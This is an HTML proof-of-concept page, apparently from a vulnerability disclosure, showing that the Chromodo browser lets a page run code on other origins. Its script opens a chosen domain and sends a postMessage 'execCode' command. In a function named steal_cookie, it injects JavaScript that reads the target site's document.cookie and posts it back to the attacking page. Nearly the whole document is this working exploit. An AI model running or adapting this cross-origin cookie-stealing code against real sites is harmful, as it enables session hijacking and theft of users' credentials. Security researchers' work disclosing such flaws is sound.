1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

<html>
<head></head>
<body>
<p>
The chromodo browser disables the same origin policy, use this page to test.
<br>
<a href="https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php">https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php</a>
</p>
<p>
Domain you would like to access:
<input id=target value="http://ssl.comodo.com/" size=32>
</p>
<p>
Code you would like to run:
<input id=code value="document.cookie" size=32>
</p>
<p>
Output will appear here:
</p>
<textarea id=result cols=64 rows=10>
</textarea>
</p>
<p>
<input type=submit onclick="steal_cookie(window.open(document.getElementById('target').value))">
</p>
<script>

// This function receives the result from the target.
function receive(result)
{
    document.getElementById('result').value = unescape(result);
}

// Dispatch exploit message, and send result back.
function steal_cookie(obj)
{
    code = "cmd='receive(" + '"' + "' + escape(document.cookie) +'" + '"' + ");';"
         + "window.opener.postMessage(JSON.stringify({command: 'execCode', code: cmd}), '*');"
         + "window.close();"

    console.log(code);
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    code,
        }), "*");
    }, 2000);
}
</script>
</body>
</html>